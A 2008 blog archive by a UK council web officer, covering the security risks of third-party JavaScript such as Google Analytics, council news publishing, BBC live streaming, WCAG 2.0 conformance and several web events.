Monday 24 November 2008

Google Analytics - the risks of 3rd party script

The Register has recently reported on the potential security vulnerability of using Google Analytics, and as we use this for various sites I thought it worth exploring a little further, especially as there are wider implications around linking to any third party javascript code.

The essence of the Register's article, Google Analytics - Yes, it is a security risk, is that any third party javascript you include on your pages could open you up to vulnerabilities. You are essentially at the mercy of the owners of that code, trusting them not to do anything malicious. And there are plenty of things they could do, including stealing session cookies and form data, or even executing a 'cross site script proxy' attack, which could surrender control of a user's login session.

So how big is the risk? There are a couple of factors to consider:

Firstly, how well can the script owner be trusted? A company such as Google can probably be trusted quite a bit, although we're not just talking about the integrity of the company's ethics. We also need to consider how seriously they take security themselves - how stringent are their own practices? Again, we can be fairly sure that Google is pretty hot on best security practices, so the risk is relatively low. The same might not be true of other third party sites.

Secondly, how big a target is your site? The case referred to in the Register's story was Barrack Obama's website. That site is obviously going to be a huge target for potential hackers, with security an immensely important subject. Sites with a lower profile can reasonably be assumed to be less of a target, although the risks can still not be discounted entirely.

In a recent forum post discussing this issue, the following advice was given:
if you must use external JScript, make sure it is a trusted source, and by trusted, I don't just mean the company and their reputation, but also their own security practises, and do not under any circumstances link 3rd party JScript to a "secured" or sensitive area of a site
This seems to be pretty sensible, and is something we will need to consider from now on, not just in relation to Google Analytics, but when looking at linking to any third party script. Better safe than sorry...

Friday 21 November 2008

Keeping up with your own news

Our organisation has been in the news a fair bit recently. Well, actually, being a local authority we're always in the local news and the coverage is rarely positive (and often inaccurate too). But what I've been increasingly concerned about recently is the fact that the local media keep getting there first - reporting on stories hours, sometimes days, before our own website publishes the information.

The case in point was demonstrated this week when my organisation made some important (and controversial) decisions on school closures. I'm assuming the press were notified through the usual channels, and the news made it onto their websites within hours. We, however, didn't post an update on our website until the following afternoon.

The major problem with this, apart from it looking generally poor, is that it forces citizens to look elsewhere for information that we should be providing them with. This also means that the information they eventually find will probably have been edited, and is usually accompanied by a long string of unmoderated user comments positing all sorts of theories and opinions, many of which are stultifyingly ill-informed (thanks to Chris Morris for that excellent phrase). And of course, most people will probably look to the media first anyway, but perhaps then come to our site to check the facts and to get background information. If we're not providing content to coincide with news stories appearing elsewhere, and making it prominent from the homepage, we're really failing our users.

It's not that we have a lack of news either. I recently encountered a problem where important press releases were too quickly getting bumped off the home page (which only displays the 3 most recent releases, with a link through to the rest). Our school closures story, for example, got bumped within hours by two stories about awards ceremonies and another about tips for Christmas shopping. Whilst non-critical releases are great (SOCITM's 2008 Better Connected report commended the 76% of local authority sites which featured 'good current news beyond a report of a council meeting or decision'), if the softer stories are drowning out the more important ones we are again failing our users.

This is all compounded by the fact that our site does not support RSS feeds or news alerts, so we're not actively 'pushing' these stories in the first place (SOCITM found that only 33% of local authority sites do either of these things). Our news stories are given good prominence on the homepage, but unless you actually visit our site you probably won't find our press releases.

Another problem (which impacts the speed of all developments on our site) is that content often has to go via various levels of approval before it can be published. By speeding up this approval process, or by further devolving editorial authority, we could drastically improve our ability to react to news and events more quickly and effectively. Only then can we consider ourselves to be, as the Better Connected report puts it, newsworthy.

Key points:
  • Get press releases online as quickly or quicker than the media
  • Make them prominent on the homepage, for a reasonable period of time
  • Explore other methods of distributing news - RSS, alerts, e-mail digests, SMS, news tickers etc

Wednesday 19 November 2008

Live web broadcasts and the BBC licence fee

The hot debate surrounding the BBC licence fee is about the get even more complicated with the BBC's announcement that yet more channels are set to be broadcast live online.

An item on the BBC website today reported:
BBC shows including EastEnders, Heroes and Never Mind The Buzzcocks will be available to watch live online from next week, the BBC has announced.

BBC One and BBC Two will be streamed live, - just as BBC Three, BBC Four, CBBC, CBeebies and BBC News are already broadcast on their channel websites.

Director of BBC vision Jana Bennett said this "completes our commitment" to make channels available online.

The live simulcast for both channels will be available from 27 November.

If viewers miss any programmes they will be available for up to a week on the BBC iPlayer.

"From 27 November licence fee payers will be able to watch BBC programmes live wherever they are in the UK on their computers, mobile phones and other portable devices," Ms Bennett said.

According to media watchdog Ofcom, the number of people watching TV on the internet has doubled in the last 12 months.

In 2006, Channel 4 became the first major UK TV channel to be simulcast on the internet.

As The Register points out:
Note "licence fee payers" in that quote. While catching up with shows on iPlayer does not require a TV licence, watching any live broadcast - including over the internet - does.

Big headaches lurk for enforcement authorities if live online viewing enters the mainstream: will cafes that offer Wi-Fi be required to buy a business TV licence in case their customers watch a bit of BBC One, for example?
Might this therefore also affect public libraries, who provide free internet access? And how far will the TV licence enforcers go? We have already seen mobile phone companies passing on details of customers who have purchased 3G or wireless-enabled handsets, so it's not a huge leap to imagine ISPs doing the same (if they're not already doing so).

Then comes the ambiguity of what constitutes a 'live' broadcast. A lot of 'live' streamed content is actually on a delay - a fact proven when you lose the stream and the player reconnects, taking you back to the exact second from whench you left off. TV Licencing has previously stated that even delayed 'hour plus one' type services would count as live, so we can see how ambiguous this could get.

Finally, how obvious will the difference be between 'live' content (requiring a licence) and non-live content (currently everything on iPlayer - not requiring a licence)? If the difference is subtle, it could be making it very easy for people to break the law without even realising it.

Monday 17 November 2008

WCAG 2 - claiming conformance

Anyone wanting to claim conformance to the nascent WCAG 2.0 will have to provide a specific conformance claim on their site, according to the documentation found at www.w3.org/TR/WCAG20:
Required components of a conformance claim

Conformance claims are not required. Authors can conform to WCAG 2.0 without making a claim. However, if a conformance claim is made, then the conformance claim must include the following information:
  1. Date of the claim
  2. Guidelines title, version and URI "Web Content Accessibility Guidelines 2.0 at {URI of final document}"
  3. Conformance level satisfied: (Level A, AA or AAA)
  4. A concise description of the Web pages such as a list of URIs for which the claim is made, including whether subdomains are included in the claim.
    • Note 1: The Web pages may be described by list or by an expression which describes all of the URIs included in the claim.
    • Note 2: Web-based products that do not have a URI prior to installation on the customer's Web site may have a statement that the product would conform when installed.
  5. A list of the Web content technologies relied upon.
    • Note: If a conformance logo is used, it would constitute a claim and must be accompanied by the required components of a conformance claim listed above.
Note - the concept of a technology baseline has been dropped.

The Understanding Conformance page gives some examples of wording. In the spirit of this, I decided to produce such a claim for my own Pretty Simple web site, which was used in the implementation report as part of the WCAG 2.0 Candidate Recommendation stage and has, since getting the thumbs up from the WCAG 2.0 Working Group, been claiming conformance.
On September 25th 2008, all Web pages found at www.prettysimple.co.uk conform to the Web Content Accessibility Guidelines 2.0 at www.w3.org/TR/WCAG20. Level Double-A conformance.

The web content technology relied upon is XHTML 1.0 (Strict).

The technologies used but not relied upon are: JavaScript, CSS 2.0, Flash.
I wasn't sure about where to put CSS, but felt that, as it is utilised purely for presentation and not content, it shouldn't be considered as a 'relied-upon' technology. The Flash banners are only for presentation, and have images with alt attributes behind them, so are certainly not relied upon. Equally, the Javascript used to bring in the RSS feeds on the Links page are accompanied by noscript links, so are not essential for any user.

I could also go into detail about the Level AAA Success Criteria that I meet, and may do this at some point in the future, along with details of the various user agents with which I have tested the site.

One question that has arisen is when might I be expected to update the statement? Presumably the next time I test the entire site, although given that I am making no significant changes to the pages - and only adding content occasionally, I might be forgiven for updating the date every time I update the website.

Thursday 13 November 2008

World Usability Day

Today was World Usability Day. As the website puts it:
It's about "Making Life Easy" and user friendly. Technology today is too hard to use. A cell phone should be as easy to access as a doorknob. In order to humanize a world that uses technology as an infrastructure for education, healthcare, transportation, government, communication, entertainment, work and other areas, we must develop these technologies in a way that serves people first…

World Usability Day was founded in 2005 as an initiative of the Usability Professionals' Association to ensure that services and products important to human life are easier to access and simpler to use.
A nearby event was put on by local user experience consultancy User Vision, and I've just got back from a very interesting few hours there.

A really interesting presentation by Monty Lilburn introduced us to Loadstone GPS - open source software that utilises GPS on mobile phones, resulting in easy-to-follow directions of significant use to blind and visually impaired people (through the use of mobile screen readers such as Talks or Mobile Speak). We were also shown a great little video that they had made, showing Lilburn navigating his way through Edinburgh using the software on his phone. It can (for now) be seen at www.tinyurl.com/6cukzt.

Elsewhere we saw a demonstration of eye-tracking software, which User Vision's Jamie advocated as a very powerful tool able to give you some very meaningful results; Donna was letting people get their hands on her iPhone to see how easy to use it is (or isn't); Ross was giving people a driving test challenge with the latest in iTV software; and I had an interesting chat with their accessibility consultant Mark about everything from WCAG 2.0 to the lack of a decent legal precedent in the UK which would help underline the importance of accessibility standards.

Thanks to Chris, Laura and everyone else at User Vision for an interesting afternoon.

Update - User Vision now have a press release about the day on their website, along with some useful links and a handful on photos (including one of the back of my head!).

Wednesday 12 November 2008

WCAG 2.0 and Delivering Inclusive Websites

In June 2008 Central Office of Information (COI) produced the Delivering Inclusive Websites guidance:
These guidelines are for public sector website owners and digital media project managers wishing to deliver inclusive, accessible websites. This document sets out the minimum standard of accessibility for public sector web content and web authoring tools. It recommends a user-centred approach to accessibility, taking account of user needs in the planning and procurement phases of web design projects.
These guidelines currently make reference to WCAG 1.0, so I wanted to know what would happen once WCAG 2.0 is approved. There is a paragraph which refers to this, but it is a little vague:
At the time of writing, version 1.0 of the Web Content Accessibility Guidelines is the current standard for web accessibility. At such time that version 2.0 becomes a W3C Recommendation, this policy will be reviewed within six months. Consideration will be given to the adoption of version 2.0 as the minimum standard for public sector websites.
Our organisation is currently looking at options for a new web content management system. As such a procurement would be a long-term commitment, I'm keen to know that the goalposts are not going to move halfway through implementing a solution. Whilst it's true that sites built to conform to WCAG 1.0 should meet WCAG 2.0 without too many problems, I feel it is crucial that the minimum standards are recorded in black and white in any requirements documentation.

I have therefore submitted the following enquiry to the COI:
With WCAG 2.0 currently at Proposed Recommendation stage, and due to be approved by Christmas, what plans are there to modify the information provided as part of the "Delivering inclusive websites" guidelines? What are the timescales involved i.e. how soon should the public sector be building websites according to WCAG 2.0 instead of WCAG 1.0?
and will post the reply here when received.

Update 16th Nov

Reply from COI:
We plan to review adoption of WCAG 2.0 with the public sector community. It is unclear at this stage whether doing so is in our best interests. For example, the new AA requirement for audio description and subtitles for every video would mean that we Level-A would be the only realistic option - and then the risk is that no-one implements the other Level-AA requirements.

We would also like to see what the European Commission thinks about the new standard. Anything we do would have to be in line with their thinking.

I don't think there's anything stopping people building to WCAG 2.0. Am I right in thinking that any website that's AA according to version 2.0 is automatically v1.0 compliant?
An extract from my response is as follows:
Unfortunately I don't think it is the case that WCAG 2.0 compliant sites will meet WCAG 1.0, at the equivalent conformance level, by default. There are many WCAG 1.0 checkpoints with the 'until user agents' caveat that WCAG 2.0 have now omitted, due to the conditions being met. Plus there are obvious changes such as no longer requiring Accesskeys or metadata to add semantic information to pages, or not being required to avoid deprecated features. If you therefore designed according to WCAG 2.0, I would imagine that you might fail against WCAG 1.0 on these sorts of points.

Regarding your point about unrealistic levels of compliance - I know it has been suggested elsewhere that a phased approach might be most appropriate, to account for the cost, time and expertise required to, for example, produce compliant time-based media. There may also be potential to describe the transitional approach in the conformance claim statement (which is required for any site claiming WCAG 2.0 conformance).
Hopefully we'll see some new guidance soon.

Friday 7 November 2008

Getting feeds from your own site

I recently wanted to pull in the news items from our main corporate site onto a partner site, on an existing 'news' page which already pulls in RSS Feeds from other major content providers such as the BBC, Learning Teaching Scotland and the Scottish Government. The trouble is, our corporate site does not generate such feeds, so until now I've had to manually input each new press release.

However, I'd heard that it was possible to grab content from pages even where those pages are not set up to offer RSS feeds.

A bit of searching brought me to feedity.com. This site allows you to easily set up an RSS feed based on the content of your site, and on inputting the target URL it quickly came up with a list of press releases, exactly as intended. You can also fiddle with the results if they're not as expected.

Once you've got your RSS feed, the next task is to pull it into your page. I've used Javascript to do this, using a handy script generator found at itde.vccs.edu/rss2js.

The end result can be seen at egfl.net/news. You'll see I've got feeds coming in from the sites mentioned above, as well as the newly generated feed from our own council site. There is of course also a noscript alternative linking to the pages with the news items.

Hey presto - no more updating manually!

Edit - there are other similar services to the ones I've mentioned here. For generating RSS feeds, also see Feed43, Dapper or FeedYes. For inserting the feeds into your page, also see RSSinclude or Dynaweb RSS Pal.

PS - don't forget that linking to third party Javascript carries a certain degree of risk. See my post about security and Google Analtyics for more info.

Thursday 6 November 2008

Public feedback - not a monologue

At the recent Scotweb2 Unconference, James Munro presented Patient Opinion, a website allowing users of the NHS to post feedback on their experiences - very similar to rateMDs.com, which operates in the US. It could be described as 'Trip Advisor for the NHS', in that you can check out a hospital or practice before visiting.

Munro stated that this process was about change, not choice. The aim is to create a dialogue between the service users and service providers. Actually, users were already talking about their experiences - on blogs, flickr, youtube etc - and Patient Opinion aims to provide a single platform to collate these comments and, crucially, to allow service providers to see and respond to the feedback.

The business model sees NHS services being asked to subscribe to get access to specific information, reports and the ability to respond to individual comments online. This then provides them with a platform to report the progress they have made in responding to a complaint, and further drives the idea of change.

The great advantage for the public is that they have a platform to report (often embarrassing) issues anonymously, whilst knowing that real change is also possible as a result. Because the site is independent, Munro claims that people are less inclined to leave the sort of rants that the NHS might expect to be inundated with should the site be owned by them. NHS Choices, the NHS's own site, rejects about 24% of the feedback it receives. Patient Opinion rejects only 5% - not because the standards are different, says Munro, but because people can see the real-life benefit of an independent site and are more inclined to leave legitimate, constructive feedback. And whilst positive feedback is great, the complaints provide the most value.

So what does this mean for other areas of the public sector? One problem is that we can not 'force' third-party independent solutions to come into being - they have to develop organically. Of course, they are already happening across the Web 2.0 platforms mentioned earlier. The trick is to tap into these - not trying to moderate or silence the discussions going on, but to contribute to the stream and show people that we are listening and that change is happening.

There is a major cultural shift required to get backing for this. Once out there, comments can not be taken back (you might be able to delete the original comment, but who knows where else it has gone). Anything you say must be honest, accountable and representative of the organisation. This may mean it has to go through levels of approval, which can ruin the pace and spontaneity of the dialogue (e.g. whilst you're trying you approve a response to one comment, five more have already cropped up). And there are dangers for those not playing by the rules - think of the recent story of the 13 Virgin Atlantic employees sacked for comments they made on Facebook which, their employers felt, brought the company into disrepute. Nevertheless, it is a whole new channel of communication which we can not afford to ignore.

Tuesday 4 November 2008

WCAG 2.0 Proposed Recommendation

The WCAG 2.0 Proposed Recommendation has now been published by W3C. It contains revisions made as part of the Candidate Recommendation stage. I provided an implementation experience report as part of this and I'm pleased to say that I've been named as a contributor, so hopefully my experiences proved useful to the process.

Monday 3 November 2008

Scotweb2 Unconference summary

I'll soon be writing more specifically about some of the topics discussed at last Friday's Scotweb2 Unconference, but wanted to start with a brief summary of the day and some key messages I took from it.

All in all, the day was very uplifting and provided some real food for thought. It succeeded wonderfully in bringing together a small but committed number of Web 2.0 enthusiasts, mostly from the public sector but including a few from the commercial world. Although this meant that much of the discussions were in some way 'preaching to the converted', there was still plenty of new ideas to hear about and various calls to action.

Simon Dickson's talk exemplified this well. His passion and enthusiasm for Wordpress came over in barrel loads, and certainly gave people something to think about when comparing the minimal costs of implementing the open-source blogging CMS compared with some multi-million projects he has seen in central government. It was also a more general rallying call for us to abandon concepts of quality being defined by cost, given that most of the traditional barriers to accessing these technologies are now being increasingly broken down.

James Munro, from Patient Opinion, also delivered an interesting presentation on the relationship between his independent service and the NHS, with plenty of engaging discussion about public perception, trust and the machinations of organisational change through feedback.

Derek Hemphill presented BT Tradespace, which most of the audience confessed to never having heard of. I've now set up my free account so will report back about that soon.

Stephen Dale also gave a brief introduction to the Communities of Practice platform for local gov and public sector professionals to develop and share knowledge. Non public sector members are welcome to join in where appropriate, although overt selling is not tolerated. I myself am a member of three forums and am so far enjoying the experience.

As I say, I'll be writing more about specifics once I've had a change to collect my thoughts and notes. Thanks again to Alex Stobart for organising what turned out to be a positive and exciting day of discussion.